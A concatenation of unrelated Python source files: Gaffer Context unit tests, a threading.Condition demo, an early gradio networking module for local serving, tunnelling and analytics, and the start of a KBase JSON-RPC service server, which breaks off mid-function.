self.assertEqual( c.substitute( "\\", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\" )
self.assertEqual( c.substitute( "\\$a", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.NoSubstitutions ), "#${a}" )
def testFrameAndVariableSubstitutionsAreDifferent( self ) :
c = Gaffer.Context()
c.setFrame( 3 )
# Turning off variable substitutions should have no effect on '#' substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "003.$frame" )
# Turning off '#' substitutions should have no effect on variable substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "###.3" )
def testInternedStringVectorDataSubstitutions( self ) :
c = Gaffer.Context()
c["test1"] = IECore.InternedStringVectorData( [ "a", "b" ] )
c["test2"] = IECore.InternedStringVectorData()
self.assertEqual( c.substitute( "${test1}" ), "/a/b" )
self.assertEqual( c.substitute( "${test2}" ), "/" )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
# Since we're doing an evil thing that should never be done, flag it before destruct
# so it doesn't get flagged as a corrupt context when the validator runs in debug mode
c.changed( "test" )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# Tell c2 it's been invalidated, or else it could be flagged as a corrupt context when the validator
# runs in debug mode
c2.changed( "testInt" )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# Tell c2 it's been invalidated, or else it could be flagged as a corrupt context when the validator
# runs in debug mode
c2.changed( "testInt" )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
# c2 must be destroyed first, since it depends on c1
del c2
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
del c["ui:test"]
self.assertEqual( c.names(), Gaffer.Context().names() )
self.assertEqual( h, c.hash() )
c["ui:test"] = 1
c["ui:test2"] = "foo"
self.assertEqual( h, c.hash() )
c.removeMatching( "ui:test*" )
self.assertEqual( c.names(), Gaffer.Context().names() )
self.assertEqual( h, c.hash() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyEnvironmentSubstitutions( self ) :
GafferTest.testManyEnvironmentSubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( r"\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( r"\~" ), "~" )
self.assertEqual( c.substitute( r"\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )
self.assertEqual( c["b"], "bear" )
def testRemoveMatching( self ) :
c = Gaffer.Context()
c["a_1"] = "apple"
c["a_2"] = "apple"
c["b_1"] = "bear"
c["b_2"] = "bear"
c["c_1"] = "cat"
c["c_2"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )
# test Context.removeMatching()
c.removeMatching( "a* c*" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
h = c.hash()
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
def testTime( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )
c.setFrame( 12.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )
c.setFramesPerSecond( 48.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 48.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )
def testEditableScope( self ) :
GafferTest.testEditableScope()
def testCanceller( self ) :
c = Gaffer.Context()
c["test"] = 1
self.assertEqual( c.canceller(), None )
canceller = IECore.Canceller()
cc = Gaffer.Context( c, canceller )
self.assertEqual( cc["test"], 1 )
self.assertTrue( cc.canceller() is not None )
canceller.cancel()
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
contextCopy = Gaffer.Context( cc )
self.assertTrue( contextCopy.canceller() is not None )
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
def testCancellerLifetime( self ) :
canceller = IECore.Canceller()
context = Gaffer.Context( Gaffer.Context(), canceller )
cancellerWeakRef = weakref.ref( canceller )
del canceller
self.assertIsNotNone( cancellerWeakRef() )
del context
self.assertIsNone( cancellerWeakRef() )
def testOmitCanceller( self ) :
context1 = Gaffer.Context( Gaffer.Context(), IECore.Canceller() )
self.assertIsNotNone( context1.canceller() )
context2 = Gaffer.Context( context1, omitCanceller = True )
self.assertIsNone( context2.canceller() )
context3 = Gaffer.Context( context1, omitCanceller = False )
self.assertIsNotNone( context3.canceller() )
@staticmethod
def collisionCountParallelHelper( seed, mode, countList ):
r = GafferTest.countContextHash32Collisions( 2**20, mode, seed )
for i in range(4):
countList[i] = r[i]
# TODO - add new test flag `gaffer test -type all|standard|performance|verySlow`, where "verySlow"
# would enable tests like this
@unittest.skipIf( True, "Too expensive to run currently" )
def testContextHashCollisions( self ) :
iters = 10
# Test all 4 context creation modes ( see ContextTest.cpp for descriptions )
for mode in [0,1,2,3]:
# This would be much cleaner once we can use concurrent.futures
import threading
results = [ [0,0,0,0] for i in range( iters ) ]
threads = []
for i in range( iters ):
x = threading.Thread( target=self.collisionCountParallelHelper, args=( i, mode, results[i] ) )
x.start()
threads.append( x )
for x in threads:
x.join()
s = [0,0,0,0]
for l in results:
for i in range(4):
s[i] += l[i]
# countContextHash32Collisions return the number of collisions in each of four 32 bits chunks
# of the hash independently - as long as as the uniformity of each chunk is good, the chance
# of a full collision of all four chunks is extremely small.
#
# We test it with 2**20 entries. We can approximate the number of expected 32 bit
# collisions as a binomial distribution - the probability changes as entries are inserted, but
# the average probability of a collision per item is when half the entries have been processed,
# for a probability of `0.5 * 2**20 / 2**32 = 0.00012207`. Using this probability, and N=2**20,
# in a binomial distribution, yields a mean outcome of 128.0 collisions.
# From: https://en.wikipedia.org/wiki/Birthday_problem, section "Collision Counting", the true
# result is `2**20 - 2**32 + 2**32 * ( (2**32 - 1)/2**32 )**(2**20) = 127.989` .. close enough
# to suggest our approximation works. Based on our approximated binomial distribution then,
# taking the number of iterations up to 10 * 2**20 for our sum over 10 trials, the sum should
# have a mean of 1280, and be in the range [1170 .. 1390] 99.8% of the time.
#
# This means there is some chance of this test failing ( especially because this math is
# approximate ), but it is too slow to run on CI anyway, and this test should provide some
# assurance that our MurmurHash is performing extremely similarly to a theoretical ideal
# uniformly distributed hash, even after a trick like summing the entry hashes.
#
# Because the bits of the hash are all evenly mixed, the rate of collisions should be identical
# regardless of which 32bit chunk we test.
#
# One weird note for myself in the future: There is one weird pattern you will see if you
# print s : If using 64bit sums of individual hashes, then the low 32 bit chunks
# ( chunks 0 and 3 ) will always produce the same number of collisions in mode 0 and 1.
# This is because most of the entries in mode 1 do not change, and the only source of variation
# is the one entry which matches mode 0 ... but this is expected, and crucially, while the
# number of collisions within mode 0 and mode 1 come out identical, this does not increase the
# chances of a collision between contexts with one varying entry, and context with one varying
# entry plus fixed entries ( mode 3 demonstrates this ).
for i in range(4):
self.assertLess( s[i], 1390.0 )
self.assertGreater( s[i], 1170.0 )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextHashPerformance( self ) :
GafferTest.testContextHashPerformance( 10, 10, False )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextHashPerformanceStartInitialized( self ) :
GafferTest.testContextHashPerformance( 10, 10, True )
if __name__ == "__main__":
unittest.main()
|
condition.py
|
import time
import threading
def consumer(cond):
t = threading.currentThread()
with cond:
cond.wait()
print '{}: Resource is available to consumer'.format(t.name)
def producer(cond):
t = threading.currentThread()
with cond:
print '{}: Making resource available'.format(t.name)
cond.notifyAll()
condition = threading.Condition()
c1 = threading.Thread(name='c1', target=consumer, args=(condition,))
c2 = threading.Thread(name='c2', target=consumer, args=(condition,))
p = threading.Thread(name='p', target=producer, args=(condition,))
c1.start()
time.sleep(1)
c2.start()
time.sleep(1)
p.start()
|
networking.py
|
"""
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from http.server import HTTPServer as BaseHTTPServer, SimpleHTTPRequestHandler
import pkg_resources
from distutils import dir_util
from gradio import inputs, outputs
import json
from gradio.tunneling import create_tunnel
import urllib.request
from shutil import copyfile
import requests
import sys
import analytics
INITIAL_PORT_VALUE = (
7860
) # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = (
100
) # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv('GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "static/")
STATIC_PATH_TEMP = "static/"
TEMPLATE_TEMP = "index.html"
BASE_JS_FILE = "static/js/all_io.js"
CONFIG_FILE = "static/config.json"
ASSOCIATION_PATH_IN_STATIC = "static/apple-app-site-association"
ASSOCIATION_PATH_IN_ROOT = "apple-app-site-association"
FLAGGING_DIRECTORY = 'static/flagged/'
FLAGGING_FILENAME = 'data.txt'
analytics.write_key = "uxIFddIEuuUcFLf9VgH2teTEtPlWdkNy"
analytics_url = 'https://api.gradio.app/'
def build_template(temp_dir):
"""
Create HTML file with supporting JS and CSS files in a given directory.
:param temp_dir: string with path to temp directory in which the html file should be built
"""
dir_util.copy_tree(STATIC_TEMPLATE_LIB, temp_dir)
dir_util.copy_tree(STATIC_PATH_LIB, os.path.join(
temp_dir, STATIC_PATH_TEMP))
# Move association file to root of temporary directory.
copyfile(os.path.join(temp_dir, ASSOCIATION_PATH_IN_STATIC),
os.path.join(temp_dir, ASSOCIATION_PATH_IN_ROOT))
def render_template_with_tags(template_path, context):
"""
Combines the given template with a given context dictionary by replacing all of the occurrences of tags (enclosed
in double curly braces) with corresponding values.
:param template_path: a string with the path to the template file
:param context: a dictionary whose string keys are the tags to replace and whose string values are the replacements.
"""
print(template_path, context)
with open(template_path) as fin:
old_lines = fin.readlines()
new_lines = render_string_or_list_with_tags(old_lines, context)
with open(template_path, "w") as fout:
for line in new_lines:
fout.write(line)
def render_string_or_list_with_tags(old_lines, context):
# Handle string case
if isinstance(old_lines, str):
for key, value in context.items():
old_lines = old_lines.replace(r"{{" + key + r"}}", str(value))
return old_lines
# Handle list case
new_lines = []
for line in old_lines:
for key, value in context.items():
line = line.replace(r"{{" + key + r"}}", str(value))
new_lines.append(line)
return new_lines
def set_config(config, temp_dir):
config_file = os.path.join(temp_dir, CONFIG_FILE)
with open(config_file, "w") as output:
json.dump(config, output)
def get_first_available_port(initial, final):
"""
Gets the first open port in a specified range of port numbers
:param initial: the initial value in the range of port numbers
:param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
:return:
"""
for port in range(initial, final):
try:
s = socket.socket() # create a socket object
s.bind((LOCALHOST_NAME, port)) # Bind to the port
s.close()
return port
except OSError:
pass
raise OSError(
"All ports from {} to {} are in use. Please close a port.".format(
initial, final
)
)
def send_prediction_analytics(interface):
data = {'title': interface.title,
'description': interface.description,
'thumbnail': interface.thumbnail,
'input_interface': interface.input_interfaces,
'output_interface': interface.output_interfaces,
}
print(data)
try:
requests.post(
analytics_url + 'gradio-prediction-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
def serve_files_in_background(interface, port, directory_to_serve=None, server_name=LOCALHOST_NAME):
class HTTPHandler(SimpleHTTPRequestHandler):
"""This handler uses server.base_path instead of always using os.getcwd()"""
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
def translate_path(self, path):
path = SimpleHTTPRequestHandler.translate_path(self, path)
relpath = os.path.relpath(path, os.getcwd())
fullpath = os.path.join(self.server.base_path, relpath)
return fullpath
def log_message(self, format, *args):
return
def do_POST(self):
# Read body of the request.
if self.path == "/api/predict/":
# Make the prediction.
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
raw_input = msg["data"]
prediction, durations = interface.process(raw_input)
output = {"data": prediction, "durations": durations}
if interface.saliency is not None:
saliency = interface.saliency(raw_input, prediction)
output['saliency'] = saliency.tolist()
# if interface.always_flag:
# msg = json.loads(data_string)
# flag_dir = os.path.join(FLAGGING_DIRECTORY, str(interface.hash))
# os.makedirs(flag_dir, exist_ok=True)
# output_flag = {'input': interface.input_interface.rebuild_flagged(flag_dir, msg['data']),
# 'output': interface.output_interface.rebuild_flagged(flag_dir, processed_output),
# }
# with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
# f.write(json.dumps(output_flag))
# f.write("\n")
self.wfile.write(json.dumps(output).encode())
analytics_thread = threading.Thread(
target=send_prediction_analytics, args=[interface])
analytics_thread.start()
elif self.path == "/api/flag/":
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
flag_dir = os.path.join(FLAGGING_DIRECTORY,
str(interface.flag_hash))
os.makedirs(flag_dir, exist_ok=True)
output = {'inputs': [interface.input_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['input_data']) for i
in range(len(interface.input_interfaces))],
'outputs': [interface.output_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['output_data']) for i
in range(len(interface.output_interfaces))],
'message': msg['data']['message']}
with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
f.write(json.dumps(output))
f.write("\n")
else:
self.send_error(404, 'Path not found: {}'.format(self.path))
class HTTPServer(BaseHTTPServer):
"""The main server, you pass in base_path which is the path you want to serve requests from"""
def __init__(self, base_path, server_address, RequestHandlerClass=HTTPHandler):
self.base_path = base_path
BaseHTTPServer.__init__(self, server_address, RequestHandlerClass)
httpd = HTTPServer(directory_to_serve, (server_name, port))
# Now loop forever
def serve_forever():
try:
while True:
sys.stdout.flush()
httpd.serve_forever()
except (KeyboardInterrupt, OSError):
httpd.shutdown()
httpd.server_close()
thread = threading.Thread(target=serve_forever, daemon=False)
thread.start()
return httpd
def start_simple_server(interface, directory_to_serve=None, server_name=None):
port = get_first_available_port(
INITIAL_PORT_VALUE, INITIAL_PORT_VALUE + TRY_NUM_PORTS
)
httpd = serve_files_in_background(interface, port, directory_to_serve, server_name)
return port, httpd
def close_server(server):
server.server_close()
def url_request(url):
try:
req = urllib.request.Request(
url=url, headers={"content-type": "application/json"}
)
res = urllib.request.urlopen(req, timeout=10)
return res
except Exception as e:
raise RuntimeError(str(e))
def setup_tunnel(local_server_port):
response = url_request(GRADIO_API_SERVER)
if response and response.code == 200:
try:
payload = json.loads(response.read().decode("utf-8"))[0]
return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
except Exception as e:
raise RuntimeError(str(e))
def url_ok(url):
try:
r = requests.head(url)
return r.status_code == 200
except ConnectionError:
return False
|
GenericsServiceServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from GenericsService.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'GenericsService'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from GenericsService.GenericsServiceImpl import GenericsService # noqa @IgnorePep8
impl_GenericsService = GenericsService(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'GenericsService'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
